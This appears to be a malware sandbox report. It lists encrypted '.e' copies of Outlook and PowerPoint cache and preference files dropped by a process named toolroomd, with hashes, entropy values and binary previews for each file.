SHA-512:	A18B69A10B656F2DDAF8F84BE4419299C279052DC377F4F7D8751F27723B8851F17BB9947E9B695C2A209D5F02AF777EEE6FFF591FAF12E4808EEA4C34BAF79B
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.p....V>.hR..%.......s..]3.X-.....\|.T.9..sba..X" ..?\[.J.9....bC.H.Lr_g_.h..7.=f.Z.NIn.I.2.F...\|.izBPWy......+W..#.Q.......^....Dh.Hq.k._>..T..@....['...!......b..p.=..A...z......x....#D...c.....!.v.x....,.j..Q...b....Qg...~AgU..?.d......T.'.=...X.4Y.=...1..b$.i...W.c0....Gv...D..@...;.....U.....L.l%).&..G.9....mC.XR.e..1.<g.$.u`1. :...r....H.y..BQ.V.S.j=1..aN..u+i).......<'...n..3&...2.......%E.5..<.\.7M.}.Oh.(....GU..'X$.!..L..j..-\...1.I...O.. ...m..GVrx.]sK.l1.$0..@......Q.p. ..BX5..d/...VS%h.:.....Q..q..O.......'...b.}.....!Wy...o.].K^kr..}.7....S=..Q..zx..........z....Qh...ul.T5y#.`(.9............^....\|....X.....@_4..34B.(g%.~.u.. ..Nq..^4~a..uh.=...:.h.c.;..!v....../..Z.`....lv\|$...2.:.a..tL.hB...J.8..]s..)..G.gaX0J.s.Q1g.\.......'.6T(R m..w..%.....O3......6............hV.G......Rdxz.....7.....F...3w....<.(....%..5...F.k........................\.........^./k..`R..V5..jd..ysVT9.X

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Yu MinchoRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1394
Entropy (8bit):	7.441616355543553
Encrypted:	false
SSDEEP:	24:EhhZZD3gY8R3oHy7uyt8LJjenX3tpQJLEYjNIWjdPfzT9VQNpsePc0m7:EhhZZjgYtS7n892rCLEYj+4dTT9GpNpq
MD5:	92800321901B87F610C94BEB65D8E59C
SHA1:	554886C56F7E7D283B5B54D1A2555C75368830B7
SHA-256:	43639BB2E18D0B8E73BCFE8E6D94AB8723E0A101653EEF544BEA674CB40A2305
SHA-512:	CACDE3A2F66F00F7ABFA1E083A1926751904ACF66F51AAEC1EFF9FCA1CAA843CB4C8A4B830FC7433DA50173DFD4CEA23741D8E3FA4B3D63B5A725DBEB948B43B
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a...s.....;.P@.b.S."".$.C..0O'...Q.b:F..~........}..w..7.^.......S.$5X9.X;.....U.:.".4S".E..b..reA[Je......Q.Z.y.J.r...w..(.02x...3.&.Y.`.{...O/:. sE...u...gZ0....T.~+(.bFQ....n.i....F7Bf']....Y!y.&.U.....s..{.6$....G.G..6S.8.u.i..C......L.!$.G2.pZ.....ow.x!..AS....pp.8(U.y.`.e.M..t......6....24'z.(.....]\iJ.[j...c.9..^...s(..Z.OB. .0......k....+FX.qn.}..Z.-F.....3..c!..u....<....q.Z..a.....J......T.Wv..-.c_.....v...h.\\2..P.3.Cy.c/..d..W....s.y.s9.N.......8.f.".. U_...........y.....3.qc.J.j<.%....m....@.[..&.".:......)<..j.8....VJ.L$..7.YQ.8..7....f.-As%vT.Fd..........N.L.E.0.$.\....`.#.._.GR...........y.l.UL.t.C.....z...<..r............n.{".d1\XL...0lX.%.+..r..&.'w.1yR.B==l\........{>..{............fK...&.:.....or.D..3._....iw...X)i..$..^...e~...k....rP\...H...5.."V.>PS5...:..e0.......F.v.h...l.`.W0R.......1Z9...E....r.NGX..$.;....uv.jYW..5.R(..s~+..mn4......c".5.WEZ~I...iLGp\...

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.ZapfinoRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2834
Entropy (8bit):	7.785270738680579
Encrypted:	false
SSDEEP:	48:r+QwDxtXpsxzLXV7F7DxHFR9rAHkiGdskgp7Mg0uC4Zuse8ZRF3DNpq:r+QwDxkxzLXV7pHAE0kgp0ufZQ8Z7Tu
MD5:	7C4D8125C893E7339A5B96C7BC7E97D4
SHA1:	5D98F0E7AAFFB5120446CF83E07C6438A286C5D2
SHA-256:	5EB62C553CC4D92F9147FAD303295FE4B87C4405BD6E631A2C213594C2F5601A
SHA-512:	BA36DC18032C4727AF7E851181E17176B5398FE66B10A9187088165877E7187C932F108274ADC3CEC1F573D4D644C507E03E32204BC89008A8EA7D9F53B1C849
Malicious:	false
Preview:	.<.\|.....f.A....\|......2..,...c8kn...i .Y.a..".l.l.G@.......`N2?.6..t.&...E..&.tq...+=.8...\|U.H8....hr.5A\#7.Zp...i.....\|nl.a!z.d...f.>".#@w@.......,..vyf.,...Y.D.n...........e....P.:Ha"......T...ih.A..?M.8E..5)0..U..c..-...?.....d...y#P..]....o.d0~S.+m..yA@.;m......5U....i.....A....n...)....6f.&........U.~..H..dZ.@.S..Pg.;..tNt...~..k+.....V...4S6.........\|q...R.....%..8..c.J._..T......V<....A-..B.7>...e...fr...q.WD..$.r..F.L~.+p..C...+..\|.a.i...1[IZ...#.2.1G+..ye._w...G.Q~........=.XG8..%V..../e...1.0..v...D.Xs..[.#...c..gC.m.&..=.~7.B..Tz..L.{qMg......X..>.....l\|T.u.r.h.H..A..R&..../.~F\.b..}N.>>..Ha.#H....r}.#. .J~~...5....T..b......l.#....1_.D..n.$..r....,..1z.....k._..i.\...p....C....'......tK.....D.I.S.4....\|J.. ..6....m....9.f'.[........'.R.~8Z..@Z.y.....d..\...)3.......=.L..j>.I.=..rC4.+pht...i.u.*....6_9......f1...........z..Q...\|O..}..E."qZh.1.Eb....MA......O......T.^.5.....>.....(...b4w0..].:...3.lw.h.....`,.8. q..i.

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/Office/16.0/.microsoft outlook_Rules.xml.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	405354
Entropy (8bit):	7.953935736791641
Encrypted:	false
SSDEEP:	12288:IzyZjuLeDtYCbjtkTQE9TGQKuaYZ0X2N0M7z1HV+P6H6612:v928Es
MD5:	0C072F26987C701FD36368DC77DD31F3
SHA1:	00D8363CD3D83591BD519C1B131EFB35B0B9A40C
SHA-256:	4960D8921CFFA0ACA9D6C91C717531673C2FA6E91D35ED93EEA375205C4CF226
SHA-512:	EBE8FED5D76F3E6B83937CFDE4D4D330F6769CCE675976DC0535E8BE27B09A154803EAFE5944B43DE58FD5E05D7704296464C20E3423D816B810479FAF82AE01
Malicious:	false
Preview:	.....0..wMv..T.I.O.p%.E..............!.+B.......H...G\i[%L..&.V#..%.,..+.w, .Yx!.vz.....N..4.E6(..i.j..$1.l.......{...J&.$..1nT..VW./.....1..h........9.#f.B5"A@I.}....#~..!..{y4jY....p......l....'@....~......S.lCyRsJ....l.\t...-.WyM.Ey....Z.M$!%eAkq..q...!........q[J.......?.E......Rk..SWk_v. ......w.SP....V.1.i...3W.?x....m).hd..8.5.1..N:tq.a.....;......,P-..f.=o..7...@d..+.&.$Pf.'..LZ...wo.&.....F..J]U..cX...s1.X.E.\.A.EQ.w,.....\|[..o.w.J...cE....w.jN..%+.Oo....4.Y.......d..N.`S.[.....1.-..J.,....w. y\.o...X.7..'n....-..J.,.#d~...\.o...X.....&.l.v@9+.GeQ.xb.o.5!# ....O/+...C........)......q.9.......h]E.g9.....J.uN.u....:d.^..&.J.Y..6.u.:3..&.f....r.1.1.?q6...........-..&C..........C...o..H.A.".IX~..A%.c..,.S..5n....bSC.0..P.....-.....x:......C... ..!#...u..2p.D8....H`.}..4i..!.$.M...p.M"q..D...`.7.B0..3T5=F..\V.[...'w....Ir04;..%.c..,.S...p...........5n.......^6.n8..(......[*:.}...\...:I.......).!...e.....4.....,P-...1.D.w

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/Office/OTele/.{CB1A01F6-2C37-4CD6-AD24-7179771640F6} (0) - 436 - microsoft outlook - OTele.dat.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	762
Entropy (8bit):	6.772487021658215
Encrypted:	false
SSDEEP:	12:O6ADb0na0uApI/S+fwj2v7oglstGsewLYTc+qGm7:Otf0na0ppabfwj2DleGsePc0m7
MD5:	A3985D234FFDA59CBC0E7146F1CD3D63
SHA1:	42E6FA659842AFE836D49971A5A7121882FC53DA
SHA-256:	29C3CDF7AAA33248505B0AC9FFEB413621B039A0742BD702A73E5DB53AF7F15F
SHA-512:	4AF7AF7DFF487787C55F5614CA0EAC620133BDCA1733BC44BAAC57C8EACD3D229998974BA40D4D1B4B712779047882D58D347C1E2A8F1CB512A55A28AA65552A
Malicious:	false
Preview:	._......I..%..;..i.-P@..H..j#.)......b.......1..../...W!...o.....b.lM...sH3s?.aS=)..m.b6.3.w.h1..mQ...f.M......z]oj.6<.."a..6<.."a..x.H.......;p...z...._[R.8,{..5y.s.<...Y.a....'.4.......2..w....W.@..........ss.....D4_....o...,T.=_H.<.'.w.G.5u.]..&.....u.p.P...<.]2..`..ECB..t)...I.r....`j.[o.....u....6~.IV.Ft.'.]Fn.Q.....]+.k..6...i.EIx.o...`..ECB..t)...I../..4>.........e..S......q{K...s.........io'............8...^.B.3...d\|...bSC.0..P...................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Caches/Microsoft/uls/com.microsoft.Outlook/.ci.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	370
Entropy (8bit):	5.058327690011446
Encrypted:	false
SSDEEP:	6:UquYOD5FN6LNaBzsewLYHEec/LaqG8rQQwiQ/6:UgODp60sewLYTc+qGm7
MD5:	C77F5F4EFEBA96AA0791C0ACF83CA838
SHA1:	4C8F0558C8F90B5B988ACA9EA57023FA5824A200
SHA-256:	DE98AD9F99D8D3677004C83EC339250EF2AEB40041AF3A97131CB21B631C20E8
SHA-512:	2EC3CDF3B94D3B1E3B44DCA8B27A007C66BCA88AF519837358542BE9757AEB993B245A162FFA1C4F3574CD512A607D03672AB412BAD07E28EE0B64BCBFDB9401
Malicious:	false
Preview:	...a>k..\.q.oL..M`..k......Y.O.u....rW..t....Sq6<.."a..O.3.+.W.A.................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Caches/com.microsoft.ctrlstrcaches/.com.microsoft.Outlook.ctrlstrcache.en.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	6850
Entropy (8bit):	7.920778440075968
Encrypted:	false
SSDEEP:	96:bmxEmZsdSn7Ym5TLNe+zX8oYV7yPVzxPldulxEVWlc5jiVxefRMOdESK4uMZTyXM:bNbCYm54+LHtNzLdu/3uji3efRFES0+X
MD5:	89AA7010DB2E901680ABCF98E30DEF82
SHA1:	181061092D010010F33ECEA2C2986A1D8FDFF94E
SHA-256:	0B2DC6E42C02898F91C60BDB6F97C890A9174D61E38E6FFF5D9A1F5ADEE5EFC4
SHA-512:	77697F8D35C0727CF94BD9AE625E9570B1221B3444FAA7E91503D9CB6EFE7A7CADA1A9432E1019C37FE5E9EB1FF6DED79BD2E9E5646D90EE448B3B6A099126ED
Malicious:	false
Preview:	...a>k....M..t7E...1....{..{}...n.=...v....!...)...}..t.Vu.y!.K.bD..4....N5F{...y..]..Nl....Q,.....-...=..c+1.~r...I.9iR.... .T;....ZD.."D..Ff...U.....?J...T..B"Z...DB.g..=......0......r..T.!..u...9V.L...";...+._.fR..[S^>. ...k..Dj...~5HAv....@..x....#...}d........X...$h.s.........%..@...W.t...... o .Ar#.......}OC.v..1.t.)m.....)%.I......Kl..N.2z..d."..X.`i8V.oOg"E.M5.K./}..!^...<P..LH.{K......X..}..1........MI..QNH.+.-Bk.Z.....q.6>..q....B}x...J$....9..F. .x....#....C.H.M......,..p.k.c.(...m...$.a..+..qo..:A....K.C..'H..k..^...8..C2...2...q.u.......3...M.+.@"..4..h..._P<....`i+.7.....m.4<9.d.....Y vL.........7.fD>E-)...&Tg.........-w(...;..?.i ,....L....R...2.Z.JM...P.u.8.].cb..{+..C...7......+s.[L.^d...Y..2.Z.J....9...}.W-.%1$;....S.....:.......L....B.A.0 .y..}....2...c.....=d.jBU..V<:d..:E.h.$..l..4..d../..)...D... ..Hf37@i..'....x}....".5...<..)`...#.m ...w.Y.....$..u.K.Tq..q .P..w.=.U........'...l)~Q../.....93..~Xk...o ....

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Preferences/.com.microsoft.Outlook.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	3530
Entropy (8bit):	7.83514042461434
Encrypted:	false
SSDEEP:	96:FK3EYzWlVPNVCvPjK92jeH2J4j7PGhqLtqrESAvef4Yu:Y3EsyVPNVEj62jeWM7+hFan
MD5:	8DE7F38A5D8A0AE5D479B5E1CF7F46D0
SHA1:	8953B88E6ED0A287B928B57F4979EC9CCB6C9509
SHA-256:	94F740329AAFBC9242C131DB9C2BFDAA9767EF04B65139D94B05C353CBEF5607
SHA-512:	9B5D4D3555A909C0A50CDA41E681491C8E481CFB42F7F44C9211CCD3E5CA28FE9C0EB45F42E3CB64BBB040AC7822912D43C81FE05A347FBFDF08259AC9C2788C
Malicious:	false
Preview:	...a>k.......EQ...G..F.sk.`dQ.G.@.C.$z.....?...B..4.1.sJ2...4#.S..s....]....U.a.G...6.FRFx....._Q..}.i.+.7:{C.Z....s..+-.M&.......j..D...'=..=.".WH..26...../..w......u.a...$.T=l...F...;..P..E>B.....f.9....i!-p.!h.............G..A..o.....Ch....>u:.'.s../.,.f9......c^.SU].$MY..${.].......ww..`......!-e...s.CZ.z..<,..~...j.1l....:..,...!.7i}q./]]....\|F;>..8....KI.....5...%.N...K..jo...t..:W....2~..G....h.d..<.E.t..PSQ.F:..v.......KH..W.q.,......j?..........i....z.&\|.FI...W'...p+......tEs......C......%nH..U.eQ....L...[..Z..?......c.H...!..e.Q@u..r/[3...?.E]...Cd...e.B>..Pqs.D...S..H...N....HU,.?...=..8.H..df..7yf.A.#....=.......R....7.........\.y.)..Zg..6.U....y..^..F#....k..\@...y.\|+..`.R..x{G.... 0...5 ,......~..w..`..`.>kE..5...7.{...>..SL[m.v++H...^?...U..<Z......`...0G ..f.Q)..Y..N./k......{.2..E.....7.....G.T.z9.....+...;+k..,.]....@.q...../...?.F...?.:...".....i._...G.H.v..4..... ..../..O.z.9...U...3..rpHj......(K7.....y.2.../

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Preferences/.com.microsoft.Outlook.securebookmarks.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1978
Entropy (8bit):	7.620647825209423
Encrypted:	false
SSDEEP:	48:yjzR1gnl77Rb2PgcZMz5myqKC+jVp41MPMMNpq:yjjgl7F/zz5mpip41qu
MD5:	3499C550E04D1085949941116A7E8DC6
SHA1:	C9DEE934079AD409D985E0363F5875597E4DD511
SHA-256:	9C9FE38ABC832563D0757E5609F4C6A8B5515483FE1B32F5A788DB2F3ADF3698
SHA-512:	A9B7BD67FCF09AF30BDD985EB07372AE4BF1C3CBB9B071E76E267F3A8DDFCF152C4C4A1B8072812B193FA2C9AD438E517E9EC14E3DD920AF4333AC7CE0E6B20B
Malicious:	false
Preview:	.....0..wMv..T.I.O.p%.E..L#...z`...}...._..}.kdD.A....."..,....<....w.4.h..........up..H?..8..\9......<...d./....3.j.`..O......^.G\..9..LL..{IX.#...>#,.R.3jE0...Py.Ndi~C..<....H..ZKz.Q..t.xE..}...r+...s..L.....R=.RX_.4.4$ ...d.9......@.e..bR...Tw.......@.\|..{..[RX.[A..r\|Bb}1-2....(.{jz.......Y....tK.$.Q..V..R?r.3Aj.wz.......L.v4X..@.^..Y.0).E..I..\|d._%pF.L[..k.P.......?.^`.roN...h.n.......v..F.qv......g"...s..U.....2.#...I%I+;G.dW!>}.yOK.o.-..6.....\|.x,..mn.B...f..z.{...\|..[.l.!3.A$[".]j(Y.M=...........z.nONI\|P4B.^...`.q.c#..OE.......n2....f..BM,.I.....15q.>..._..p.=...$xa.h..93:...-.wf.g~..o..~K.........'pq...?..-...x:....X...#NL.+.3A..G.)@.9.(]..X....j..,...!..&7.S.....O.s>.#..r.`........`....+N...6".FGe;......edd*.H... .)..w?...F......oJ..jr[?...nl...!.t......I....$...7.$..^h:)]....3...d;w..X...CN.5........[.O......]....X!B.e....0e.T........J.rl..tj........{5...r.?.AM.=.8@.....{r.....Q...3...a....@...~.si.]^X....X...w.......6..

/Users/berri/Library/Containers/com.microsoft.Powerpoint/.Container.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	41228
Entropy (8bit):	7.970277313624502
Encrypted:	false
SSDEEP:	768:YF44USykyiH7s3MCGLJbAmmkX7j4Wea9pBet1WlMj+wKYgU9kg:h4Vyz3Mt9bAeX1apThkg
MD5:	73A8646810EAAE86EBAD608CB8FE8E2F
SHA1:	8C5D28C8B424233BCC013DA3064EDB761EB7DED8
SHA-256:	ED590A173062F5F73CDA18B833B78204A0C4A7017B752BA389111B84DEB180DC
SHA-512:	3644B24EB26FA0CC8D9F67112C6D5067FB7C8E22B9E9034C37041D77E7490B74CB8D5E6773B2D772F73049D839619EF517FE1970BE42276F0ABC796509B25324
Malicious:	false
Preview:	...a>k...6...\..<...5y.[M.An..ym....x.R}.......gO[n.=i.YP...(.&..053..H..0].-.1.F.}..f.}Q...`.....Y...K-.2.A.S-....v.......58.:..o...L..!#aE....\..G5.c..W..d.a.oR-Z..G...&.8.I...........Y.a.;.."...0.......<.).....F..\|...{.."..i......3l.:&.g...V.'...4i..k.4..4eS..N..(X..f.6d........%h...'S..>.-.Vb..0.X.x..-.]..L.].^.`)..C.]...V.'.....V.'.....`.....I.........h..b..[c.e..{.M..........3a.j..z.P..&.I.t.I..lY"'.i....G..!.Z..@p.'IT9...<.&..p\|E..61..b.....j$7.v?.uHc4?....v.T..i.t..dF..d.G.&0.......-i1e.`.d==(...........>....>.~>.e;.#V.O....i...v.9.........C8...s.k.....O.p3....)J~u..[.o.&...b...R...q.=.G.M...&..Q....2..RGo@K...)s..m....w..b...<o..l8..P...yW.... .S....B''G......._ak..fbA..;."..k...u..ma?.^\.K>.T......:.9F...._ak.?h.N\...v..7....~.;.m(.?...\~rf'M.y...=XXy.)$8G...QS...[...@...o...6.M. .h-..'.f`K .....f6.......f.A\.\|.i.T...9v&.....Y4m.u.....s.n...<....N....2bM....=3>..K..k.b.1...y0...s<...q..:.......E.O......0...\.(..eL....M..%\|as

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/.whatsNewJSONCache.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	3498
Entropy (8bit):	7.792751695889557
Encrypted:	false
SSDEEP:	48:yjzQcyH/+hD7I938IsD3vpn+TowJSYLvy3y0WhOXOUxg4WKAGYVC3Npq:yjvyHGNIXJ5vyOPKAGYVOu
MD5:	F2FF20D7AB25D207019A462297B67260
SHA1:	810D69B6BF4FFBF287ACEADE29525D888DE116D6
SHA-256:	D7202609C5298F50BE7DB5442DD2B0E37C999BA3FF18F91B3DC8BDE051340C25
SHA-512:	E87F66AA198D12E8761C866DB0A752564058D05C5C532743319FC9016DF14AE06D93261679D05C6F85F02A8BF94DF856B8C10BEAD1128102408C96C7CE24A423
Malicious:	false
Preview:	.....0..wMv..T.I.O.p%.E..L#...z`...}...._..}.kdD.A....."..,....<....w.4.h..........up..H?..8..\9......<...d./....3.j.`..O......^.G\..9..LL..{IX.#...>#,.R.3jE0...Py.Ndi~C..K-....u.^.T(3..0...B@.s}.......q...B.Q.'.F..{^....D.y.G...S6..Y=.G.}r.$?}8.0,...O..H.....p..,..Z..S..@.11...T.r.>W..`.....DUGw..d]...1.....~......E......p.1K...k...).~-k.H..u.>.OJ......9{..\:F.a...v...p.(.ual._..$H..s..j..._.{..J.C.5..Vw&....,d.....P]....,.1K~'.G...9..........74n.\"p.n.").g..0........b'>6X............H..R.'.....p.....MK=KF.4..".E..x....u....<..^.1H.....p.........&..3Fs..%.;..5#3.l@..e.U.d.C~P7&....9.H.....p....2..}:(D.wQ..nI.R...{...0....[....-C.......#..~.,..Z..\|.....5..}...QKxKH.......jR.+2.c.eX....N......4.\..l.......H...`N.......,..4.....g.~@.<..........c_...s.NM....9lU..\|.....g..T..\.8.d...F._..m[.:..F.c"E..8S.."Mb.<.ft.....s432..%T.Q..ys_..y..91.1.j......,.z..#..~.d.....^.y.:......d..B.$.......1.+E..76).@........\|3#...].N.?....O....^.F.c..^.R#...W

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontCache/.systemfontmetadata.json.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	405202
Entropy (8bit):	7.981225715224641
Encrypted:	false
SSDEEP:	6144:NBp5r9zvA6qMyzv1VEeJPdZonSYZFjov/GjuyZKUSwbjG:f9lByzvjPdOnSYZdoHGjWwby
MD5:	C5BFFB1BA75BA3835430C5002FD4A294
SHA1:	4FC29F8F6AA969855ADD7B03B50E8CFFDF85F8A3
SHA-256:	EB9BAA50B9C228B900CC9A54E9D2B4C75B95EE8141753D668976389A389A8882
SHA-512:	66C96ED83744A95F3932419C4A9C3DF3CBD5D3446957FA971233B054B698AD3E7B318006F4192DCE6E2B295F2130D32189A2D41E8A1DA36E68B34F925276AC08
Malicious:	false
Preview:	..f7.J.R...C.\|P._..z.b...>5T.K.p7 .ww..~W..T.x...{..j...%....,.B..ca..:.f..E&.;.l.[N8...~.x.o..?.ci.Z.`..u..y..[q.8..$\|jt..[...l6.........'h.O.8!6....9.:...4uv...%<;.SC"y...\?.,i..4uv.....6o....O.....tZl..){q<z.mF..$\|jt..[...fk]...L.3.(.o.A&T.._.EN..A.t.^..<?R..T..6RM....r.GH........$O.....=;..8....e7....Y4\|.b".h.#..5X;.I...$.#..OP..4...\|KH.J.u@.y...H..#&...mN.=.%N..!.h..9...`Kd._[E......!.....J%?...Z....4R....]...Y..8.0.XM.R......+....p.....>a9?X....../a2.....XK..(......%g..k.'v/].....-j.^.......[U...HB`OI..Dn.%mfj.kk)zv..q......pp..'.P<..Vv.0....<..#B......)<] .\|.&..Z.Q.....B.........l....AVC.....x..[....7.......0R....K.9...L......A....9....K.9..j...=s._..F.;...DrO;..&K.N%hXVz.O......\.......B..g}..K4..>..w.......O...J%M!...!...DrO;..&.O...J%mK7V....mA5..:#u.I,H...9.....wa..O........w~._`........0R..u..7.x.:.O.z^.,9.T..4..Uo.k.W.o....I...[.........k.........Q..k.e3B?....>.G=.....J{...w.*.fZ.UB.`.`.\+...<..#.4m.....uX..(t....T.'......"\|..

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Abadi MTCondensed Light.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1082
Entropy (8bit):	7.223219217841758
Encrypted:	false
SSDEEP:	24:E8LqXd7tBXGGkokFudmjVvbWZVKJ/sePc0m7:E8+Xd/72sSBkVYNpq
MD5:	01FDDA0FD1D41E2C4A4FD8889A86E0B1
SHA1:	545AF3D6D6C6388CE8E1CE2806DC929A3887ACCF
SHA-256:	7684CD3244F0A1849C9C00F6A433610EF4997CEB6BBADA2C0847A99ED6658151
SHA-512:	E7D6DC82D4E55ABC91E79150668DAFA32DDD2CF5B95B66C094DAF220F8005366E6ACA42909A4512902F25BE6FB54884239F211BAA92863AC0A106BB5529CE06B
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.aY..~A%Fm..",.3~;.g..N.....x._..\|.@.!<<....d.Ij.#....5.......C..8...q....Q....[.\|..73...,.]........./.p..Gd...3.w.H%0A.G.O....].......ZK........ .Gh..S..V........=....5...r/..q..<x>.b......Ej.c.3...(..!hPl.'.3../ g...U..V..W4.o.Q...V...P.=.Q....G.m........#.}...j7q;......G.&4...<W.h?....)>.+.;..e..&...;...0i.Y2...ME....hM{.e....s..~.j....~C..)2.d.S..1...}...'l....?...%.}v9...e?..xJ..D.....@.....%..r.._7..............q.sCk..zv!...RV..7..XyI5...S.?..`.e5f.\f....J.}I\.Kk.c.=.#}..C..Q...D..6E..V(.U.{...=..\...v..x=..[:.X.Gct.Z.g.Rp....r..T..QN..;..?G.}...-...Hii..Q....;.dv.`..D~'+..z.a..C.`..u._@.=.Z#.}.k......UU.PpK-.....:.c.......pO......u>/.h.`..7-l.nT&.$........aK....S..._.5e......................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..................................................................

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Al BayanRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1322
Entropy (8bit):	7.4167689394859275
Encrypted:	false
SSDEEP:	24:9AERkLERuy8EEt+kei6nw9GMpc6XIiH0642c91TkczyHgsePc0m7:9reLERY5xGePt0609qczyHgNpq
MD5:	8519DCC337D855DE81DCC22B8459A878
SHA1:	60E077C3AA80F990236822EFC4FDD0499E6AA34B
SHA-256:	CCDD1CD8FEA0A62AD50371CDD4E4897AAF5469AF91EBC4631CC0DC09210F2978
SHA-512:	2CC5172871B0FDBFFD42A5456001F4DA3122595250BA7848CD1D708B93832ABB99BCE4715212B49931C71ED3F2A6727612DDE6D8F3BF7E8286EBAD8296127DD9
Malicious:	false
Preview:	.<.\|.....f.A..}.r<.9.%...D.fu.;..bcZ..i .Y.a.o......L..[..l...E.W]?.. .pWx.....)...m........_.v.#LO..9s..{J...:..~(..F.'(.{'x4..v.S.>Iev0",Q....>..D..{.....Yj...._.@..}@$..kx.d;....\|.F...W..M.(@...2..1.i.9.-..}......s.32....]fb.I...7......z)\.......fHa..u.i....D...J.3......r......}...J.d.l...w...'C........UF0.]^.p..z.:..@.+.S.i._..bW.i..O.y4E.q....Y\|.Q:m.U.'&..7..3O..h$.x1i\Z.4l...._...tERe....i]........)..Y.^...I#."..Y..K..[d.<.7...u.h......7......_...3O....W......dnZ\_Y^S#..."{...s\|\|..?.-..=v.6z.P......n.G.O..9 ..xy2..pkE.....).......i7....Nqa:..G."2.B.N....9...}...>...U.<;.2.6B.{.\.@.q....l.]......Q.$...B.&.....dQ..@.p.R(.k.[.....p.C.f:.F.'.+!x........-8w.[....zt.. ....X.hY_.......u..`..\|...~(.\|...Nzai...#..[1..+..-..i...J?V4y'.>..Nh..hm.;....cv$.p.Z......P..z.~..r8-z......Y..d...s.J^.h..t.s.{..?.1.)'...h.l*$(..........o..8.....3.....G".eS.KB_...S.Xi......b.v...2...BQ..@.i.'.GF..M...zp.4....1...S..KG...[......&..o...pY..h..(t....

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Al NileRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1042
Entropy (8bit):	7.204770573826123
Encrypted:	false
SSDEEP:	24:ElTfn5KMnImFMFKzjU98vXM9vq+sePc0m7:ElTfUMnIm3jU98Pcv5Npq
MD5:	15A8AFD708F432810BF026C785D7B8BE
SHA1:	9FB76862B7B9084F9C0A66429DFB65AB138332D5
SHA-256:	8C58F95A7B51868D96999216C169293AA4461EC45A49ED607E052890D4A48454
SHA-512:	EC7599C8F2098D23D49D34BE1480F534E52FA91FE792A90613FFE3937D83C7D125DC812E39288FAAE9C16C0A01599F2B826CB6F95A31BF5264AC9635981E2B02
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.S.Y_z{...:(...mQ...]...M.r,..^F...[...x..$.....C4....q.o.[.u.......I.E.cs.!].\|.Ja.3S...D.(c.F._HT.).b.C.,..IW11P...........B.\(......../.d..2i."....:..)ow0.,m..R=r.....6......Vk.GUu.`.-0bH..1..3.h...iU..^...2.=Uo.izPo7.%G.Ns...G.;..N..?..6.BS....t..T..G.~........L..f...l..z..\./<......\|'1;.~L...j..K.q.....z..;..a...h...u..9 B.?b...R..Q.0..f......M>..J.a.....>.`..[..QmL......VV..Rp.@......xU....M...^G.......-7...a..kx.c\|..2.N.V.....[5CS3.../9..eU".\|.tN..Q.u.XM.............>[...H.t{E....-..8.4E5...~...............T.Vsq...2.\|rnUL3O....(....M......!..m.T.$RJZ6....F.D.7...%._....~.CTc6...I6.U.KmH4...R......k.....U......%..M.]a...t.1.....U..u.d.Q.I.P...................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..........................................................................................................

